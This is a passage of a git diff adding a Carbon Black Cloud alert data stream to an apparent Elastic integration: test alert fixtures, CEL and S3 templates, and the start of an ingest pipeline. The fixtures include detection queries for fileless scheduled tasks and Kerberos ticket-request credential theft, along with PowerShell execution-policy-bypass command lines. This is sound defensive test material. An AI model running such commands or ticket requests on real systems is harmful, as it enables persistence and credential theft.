AUTHORITY\\SYSTEM","childproc_guid":"","childproc_username":"","childproc_cmdline":"","ml_classification_final_verdict":"ANOMALOUS","ml_classification_global_prevalence":"MEDIUM","ml_classification_org_prevalence":"LOW"} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log-expected.json b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log-expected.json new file mode 100644 index 00000000000..94a65f7d5d3 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-watchlist.log-expected.json @@ -0,0 +1,349 @@ +{ + "expected": [ + { + "@timestamp": "2024-03-13T08:02:36.578Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2024-03-13T08:03:29.540Z", + "backend_update_timestamp": "2024-03-13T08:03:29.540Z", + "category": "THREAT", + "determination": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "value": "NONE" + }, + "device": { + "external_ip": "75.98.230.194", + "internal_ip": "172.16.100.140", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "default", + "policy_id": 6525, + "target_value": "MEDIUM" + }, + "ioc": { + "hit": "(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))", + "id": "d1080521-e617-4e45-94e0-7a145c62c90a" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "ml_classification_final_verdict": "NOT_ANOMALOUS", + "ml_classification_global_prevalence": "LOW", + "ml_classification_org_prevalence": "LOW", + "organization_key": "7DESJ9GN", + "parent": { + "cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "c:\\windows\\system32\\svchost.exe", + "pid": 1916, + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "re9M9hp8TbGLqyk6QXqQqA-0", + "process": { + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 5172, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "reason_code": "c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d", + "report": { + "description": "Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.", + "id": "LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a", + "link": "https://attack.mitre.org/techniques/T1053/", + "name": "Execution - AMSI - New Fileless Scheduled Task Behavior Detected", + "tags": [ + "execution", + "privesc", + "persistence", + "t1053", + "windows", + "amsi", + "attack", + "attackframework" + ] + }, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "C21CA826573A8D974C1E93C8471AAB7F", + "threat_notes_present": false, + "type": "WATCHLIST", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN", + "watchlists": [ + { + "id": "Ci7w5B4URg6HN60hatQMQ", + "name": "AMSI Threat Intelligence" + } + ], + "workflow": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2024-03-13T08:00:09.894Z", + "id": "1c6aba68-24cc-41e3-ad8e-4b545a587b55", + "kind": "alert", + "original": "{\"org_key\":\"7DESJ9GN\",\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN\",\"id\":\"1c6aba68-24cc-41e3-ad8e-4b545a587b55\",\"type\":\"WATCHLIST\",\"backend_timestamp\":\"2024-03-13T08:03:29.540Z\",\"user_update_timestamp\":null,\"backend_update_timestamp\":\"2024-03-13T08:03:29.540Z\",\"detection_timestamp\":\"2024-03-13T08:02:36.578Z\",\"first_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"last_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"severity\":5,\"reason\":\"Process powershell.exe was detected by the report \\\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\\\" in watchlist \\\"AMSI Threat Intelligence\\\"\",\"reason_code\":\"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d\",\"threat_id\":\"C21CA826573A8D974C1E93C8471AAB7F\",\"primary_event_id\":\"re9M9hp8TbGLqyk6QXqQqA-0\",\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"workflow\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"},\"determination\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"value\":\"NONE\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\"},\"tags\":null,\"alert_notes_present\":false,\"threat_notes_present\":false,\"is_updated\":false,\"device_id\":6612391,\"device_name\":\"EIP\\\\WW-20002\",\"device_uem_id\":\"\",\"device_target_value\":\"MEDIUM\",\"device_policy\":\"default\",\"device_policy_id\":6525,\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 10 x64\",\"device_username\":\"EIP\\\\Administrator\",\"device_location\":\"UNKNOWN\",\"device_external_ip\":\"75.98.230.194\",\"device_internal_ip\":\"172.16.100.140\",\"asset_group\":[],\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"report_id\":\"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a\",\"report_name\":\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\",\"report_description\":\"Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.\",\"report_tags\":[\"execution\",\"privesc\",\"persistence\",\"t1053\",\"windows\",\"amsi\",\"attack\",\"attackframework\"],\"report_link\":\"https://attack.mitre.org/techniques/T1053/\",\"ioc_id\":\"d1080521-e617-4e45-94e0-7a145c62c90a\",\"ioc_hit\":\"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\\\\\ccm\\\\\\\\systemtemp OR crossproc_name:windows\\\\\\\\ccm\\\\\\\\ccmexec.exe OR (process_publisher:\\\"VMware, Inc.\\\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))\",\"watchlists\":[{\"id\":\"Ci7w5B4URg6HN60hatQMQ\",\"name\":\"AMSI Threat Intelligence\"}],\"process_guid\":\"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe\",\"process_pid\":5172,\"process_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"process_sha256\":\"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3\",\"process_md5\":\"2e5a8590cf6848968fc23de3fa1e25f1\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -EP Bypass \\\\\\\\eip.demo\\\\sysvol\\\\EIP.DEMO\\\\scripts\\\\Luminol.ps1\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_publisher\":[\"Microsoft Windows\"],\"parent_guid\":\"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275\",\"parent_pid\":1916,\"parent_name\":\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"parent_sha256\":\"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3\",\"parent_md5\":\"145dcf6706eeea5b066885ee17964c09\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_cmdline\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule\",\"parent_username\":\"NT AUTHORITY\\\\SYSTEM\",\"childproc_guid\":\"\",\"childproc_username\":\"\",\"childproc_cmdline\":\"\",\"ml_classification_final_verdict\":\"NOT_ANOMALOUS\",\"ml_classification_global_prevalence\":\"LOW\",\"ml_classification_org_prevalence\":\"LOW\",\"ml_classification_anomalies\":[]}", + "reason": "Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"", + "severity": 5, + "start": "2024-03-13T08:00:09.894Z" + }, + "host": { + "hostname": "WW-20002", + "id": "6612391", + "name": "WW-20002", + "os": { + "type": "windows", + "version": "Windows 10 x64" + } + }, + "process": { + "command_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "entity_id": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "name": "powershell.exe", + "parent": { + "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "entity_id": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "executable": "c:\\windows\\system32\\svchost.exe", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "svchost.exe", + "pid": 1916 + }, + "pid": 5172 + }, + "related": { + "hash": [ + "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3", + "145dcf6706eeea5b066885ee17964c09", + "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3", + "2e5a8590cf6848968fc23de3fa1e25f1" + ], + "hosts": [ + "WW-20002", + "EIP" + ], + "user": [ + "Administrator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "EIP", + "name": "Administrator" + } + }, + { + "@timestamp": "2023-07-17T17:21:13.483Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2023-07-17T17:21:34.063Z", + "backend_update_timestamp": "2023-07-17T17:21:34.063Z", + "category": "THREAT", + "determination": { + "change_timestamp": "2023-07-17T17:21:34.063Z", + "value": "NONE" + }, + "device": { + "external_ip": "1.2.3.4", + "internal_ip": "4.3.2.1", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "default", + "policy_id": 6525, + "target_value": "MEDIUM", + "uem_id": "596B6C4DD49AEF4AB3713363DDBB1F11" + }, + "ioc": { + "hit": "fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"", + "id": "b1c1ae83-f66b-4aa3-a496-363e296f4018" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "ml_classification_final_verdict": "ANOMALOUS", + "ml_classification_global_prevalence": "MEDIUM", + "ml_classification_org_prevalence": "LOW", + "organization_key": "ABCD1234", + "parent": { + "cmdline": "\"C:\\Program Files\\demo\\sample\\myscript.exe\" ", + "effective_reputation": "NOT_LISTED", + "guid": "ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9", + "hash": { + "md5": "c7e583681f0958d4f5d32afd09d8084b", + "sha256": "4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282" + }, + "name": "c:\\program files\\demo\\sample\\myscript.exe", + "pid": 10384, + "reputation": "NOT_LISTED", + "username": "NT AUTHORITY\\SYSTEM" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "VUX7Bu7vTrWwnU8-uSVh1A-0", + "process": { + "cmdline": "powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423", + "hash": { + "md5": "0499440c4b0783266183246e384c6657", + "sha256": "d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 13636, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "reason_code": "cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab", + "report": { + "description": "Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.", + "id": "LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018", + "link": "https://attack.mitre.org/techniques/T1558/003/", + "name": "Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior", + "tags": [ + "credentialaccess", + "t1558", + "windows", + "amsi", + "attack", + "attackframework" + ] + }, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "CF4E6DE74AA8B188C0346A54FDEA940C", + "threat_notes_present": false, + "type": "WATCHLIST", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234", + "watchlists": [ + { + "id": "Ci7w5B4URg6HN60hatQMQ", + "name": "AMSI Threat Intelligence" + } + ], + "workflow": { + "change_timestamp": "2023-07-17T17:21:34.063Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "end": "2023-07-17T17:19:00.412Z", + "id": "3d80bd8b-7770-40a7-8d6b-8268fb15c59f", + "kind": "alert", + "original": "{\"org_key\":\"ABCD1234\",\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234\",\"id\":\"3d80bd8b-7770-40a7-8d6b-8268fb15c59f\",\"type\":\"WATCHLIST\",\"backend_timestamp\":\"2023-07-17T17:21:34.063Z\",\"user_update_timestamp\":null,\"backend_update_timestamp\":\"2023-07-17T17:21:34.063Z\",\"detection_timestamp\":\"2023-07-17T17:21:13.483Z\",\"first_event_timestamp\":\"2023-07-17T17:19:00.412Z\",\"last_event_timestamp\":\"2023-07-17T17:19:00.412Z\",\"severity\":10,\"reason\":\"Process powershell.exe was detected by the report \\\"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\\\" in watchlist \\\"AMSI Threat Intelligence\\\"\",\"reason_code\":\"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab\",\"threat_id\":\"CF4E6DE74AA8B188C0346A54FDEA940C\",\"primary_event_id\":\"VUX7Bu7vTrWwnU8-uSVh1A-0\",\"policy_applied\":\"NOT_APPLIED\",\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"workflow\":{\"change_timestamp\":\"2023-07-17T17:21:34.063Z\",\"changed_by_type\":\"SYSTEM\",\"changed_by\":\"ALERT_CREATION\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"},\"determination\":{\"change_timestamp\":\"2023-07-17T17:21:34.063Z\",\"value\":\"NONE\",\"changed_by_type\":null,\"changed_by\":null},\"tags\":null,\"alert_notes_present\":false,\"threat_notes_present\":false,\"is_updated\":false,\"device_id\":5890528,\"device_name\":\"demodevice\",\"device_uem_id\":\"596B6C4DD49AEF4AB3713363DDBB1F11\",\"device_target_value\":\"MEDIUM\",\"device_policy\":\"default\",\"device_policy_id\":6525,\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 11 x64\",\"device_username\":\"Test-Win11\",\"device_location\":\"UNKNOWN\",\"device_external_ip\":\"1.2.3.4\",\"device_internal_ip\":\"4.3.2.1\",\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"report_id\":\"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018\",\"report_name\":\"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\",\"report_description\":\"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.\",\"report_tags\":[\"credentialaccess\",\"t1558\",\"windows\",\"amsi\",\"attack\",\"attackframework\"],\"report_link\":\"https://attack.mitre.org/techniques/T1558/003/\",\"ioc_id\":\"b1c1ae83-f66b-4aa3-a496-363e296f4018\",\"ioc_hit\":\"fileless_scriptload_cmdline:\\\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\\\" OR scriptload_content:\\\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\\\"\",\"watchlists\":[{\"id\":\"Ci7w5B4URg6HN60hatQMQ\",\"name\":\"AMSI Threat Intelligence\"}],\"process_guid\":\"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423\",\"process_pid\":13636,\"process_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"process_sha256\":\"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd\",\"process_md5\":\"0499440c4b0783266183246e384c6657\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_cmdline\":\"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_publisher\":[\"Microsoft Windows\"],\"parent_guid\":\"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9\",\"parent_pid\":10384,\"parent_name\":\"c:\\\\program files\\\\demo\\\\sample\\\\myscript.exe\",\"parent_sha256\":\"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282\",\"parent_md5\":\"c7e583681f0958d4f5d32afd09d8084b\",\"parent_effective_reputation\":\"NOT_LISTED\",\"parent_reputation\":\"NOT_LISTED\",\"parent_cmdline\":\"\\\"C:\\\\Program Files\\\\demo\\\\sample\\\\myscript.exe\\\" \",\"parent_username\":\"NT AUTHORITY\\\\SYSTEM\",\"childproc_guid\":\"\",\"childproc_username\":\"\",\"childproc_cmdline\":\"\",\"ml_classification_final_verdict\":\"ANOMALOUS\",\"ml_classification_global_prevalence\":\"MEDIUM\",\"ml_classification_org_prevalence\":\"LOW\"}", + "reason": "Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"", + "severity": 10, + "start": "2023-07-17T17:19:00.412Z" + }, + "host": { + "hostname": "demodevice", + "id": "5890528", + "name": "demodevice", + "os": { + "type": "windows", + "version": "Windows 11 x64" + } + }, + "process": { + "command_line": "powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -", + "entity_id": "ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "0499440c4b0783266183246e384c6657", + "sha256": "d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd" + }, + "name": "powershell.exe", + "parent": { + "command_line": "\"C:\\Program Files\\demo\\sample\\myscript.exe\" ", + "entity_id": "ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9", + "executable": "c:\\program files\\demo\\sample\\myscript.exe", + "hash": { + "md5": "c7e583681f0958d4f5d32afd09d8084b", + "sha256": "4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282" + }, + "name": "myscript.exe", + "pid": 10384 + }, + "pid": 13636 + }, + "related": { + "hash": [ + "4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282", + "c7e583681f0958d4f5d32afd09d8084b", + "d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd", + "0499440c4b0783266183246e384c6657" + ], + "hosts": [ + "demodevice" + ], + "user": [ + "Test-Win11" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "Test-Win11" + } + } + ] +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-common-config.yml b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/system/test-cel-config.yml b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/system/test-cel-config.yml new file mode 100644 index 00000000000..ff03928cbb3 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/system/test-cel-config.yml @@ -0,0 +1,11 @@ +input: cel +service: carbon_black_cloud +vars: + hostname: http://{{Hostname}}:{{Port}} + org_key: xxxx + custom_api_id: xxxx + custom_api_secret_key: xxxx +data_stream: + vars: + preserve_original_event: true + enable_request_tracer: true diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/aws-s3.yml.hbs b/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/aws-s3.yml.hbs new file mode 100644 index 00000000000..017d6e7fe37 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/aws-s3.yml.hbs @@ -0,0 +1,84 @@ +{{#if collect_s3_logs}} + +{{#if bucket_arn}} +bucket_arn: {{bucket_arn}} +{{/if}} +{{#if number_of_workers}} +number_of_workers: {{number_of_workers}} +{{/if}} +{{#if interval}} +bucket_list_interval: {{interval}} +{{/if}} +{{#if bucket_list_prefix}} +bucket_list_prefix: {{bucket_list_prefix}} +{{/if}} + +{{else}} + +{{#if queue_url_alert}} +queue_url: {{queue_url_alert}} +{{else if queue_url}} +queue_url: {{queue_url}} +{{/if}} +{{#if visibility_timeout}} +visibility_timeout: {{visibility_timeout}} +{{/if}} +{{#if api_timeout}} +api_timeout: {{api_timeout}} +{{/if}} +{{#if max_number_of_messages}} +max_number_of_messages: {{max_number_of_messages}} +{{/if}} +{{#if file_selectors}} +file_selectors: +{{file_selectors}} +{{/if}} +{{/if}} + +expand_event_list_from_field: Records +{{#if access_key_id}} +access_key_id: {{access_key_id}} +{{/if}} +{{#if secret_access_key}} +secret_access_key: {{secret_access_key}} +{{/if}} +{{#if session_token}} +session_token: {{session_token}} +{{/if}} +{{#if shared_credential_file}} +shared_credential_file: {{shared_credential_file}} +{{/if}} +{{#if credential_profile_name}} +credential_profile_name: {{credential_profile_name}} +{{/if}} +{{#if role_arn}} +role_arn: {{role_arn}} +{{/if}} +{{#if endpoint}} +endpoint: {{endpoint}} +{{/if}} +{{#if fips_enabled}} +fips_enabled: {{fips_enabled}} +{{/if}} +{{#if proxy_url}} +proxy_url: {{proxy_url}} +{{/if}} +tags: +{{#if collect_s3_logs}} + - collect_s3_logs +{{else}} + - collect_sqs_logs +{{/if}} +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/cel.yml.hbs b/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/cel.yml.hbs new file mode 100644 index 00000000000..e99d10d012e --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/agent/stream/cel.yml.hbs @@ -0,0 +1,74 @@ +config_version: 2 +interval: {{interval}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +resource.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +resource.url: {{hostname}}/api/alerts/v7/orgs/{{org_key}}/alerts/_search +state: + api_key: '{{custom_api_secret_key}}/{{custom_api_id}}' + want_more: false + initial_interval: {{initial_interval}} +redact: + fields: + - api_key +# The alert data stream has a 15-minute delay to ensure that no occurrences are missed. +program: | + request("POST", state.url).with({ + "Header":{ + "Content-Type": ["application/json"], + "X-Auth-Token": [state.api_key], + }, + "Body":{ + "time_range": { + "start": state.?cursor.last_backend_update_timestamp.orValue(string(now - duration(state.initial_interval) + duration("-15m"))), + "end": string(now + duration("-15m")) + }, + "sort" : [{ "field": "backend_update_timestamp", "order": "ASC"}], + }.encode_json(), + }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body.results.map(e, { + "message": e.encode_json(), + }), + "cursor": { + ?"last_backend_update_timestamp": ( + has(body.results) && body.results.size() > 0 ? + optional.of(body.results.map(e, e.backend_update_timestamp).max().as(last_update, + !has(state.?cursor.last_backend_update_timestamp) ? + last_update + : last_update < state.cursor.last_backend_update_timestamp ? + state.cursor.last_backend_update_timestamp + : + last_update + )) + : + state.?cursor.last_backend_update_timestamp + ), + }, + "want_more": body.?num_found != body.?num_available, + "api_key": state.api_key, + "initial_interval": state.initial_interval, + })) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/alert_v7/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..0082f618f83 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,912 @@ +--- +description: Pipeline for parsing Carbon Black Cloud alerts. +processors: + # ecs fields + - set: + field: ecs.version + value: '8.11.0' + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: json + ignore_failure: true + - fingerprint: + fields: + - json.id + - json.detection_timestamp + - json.backend_timestamp + - 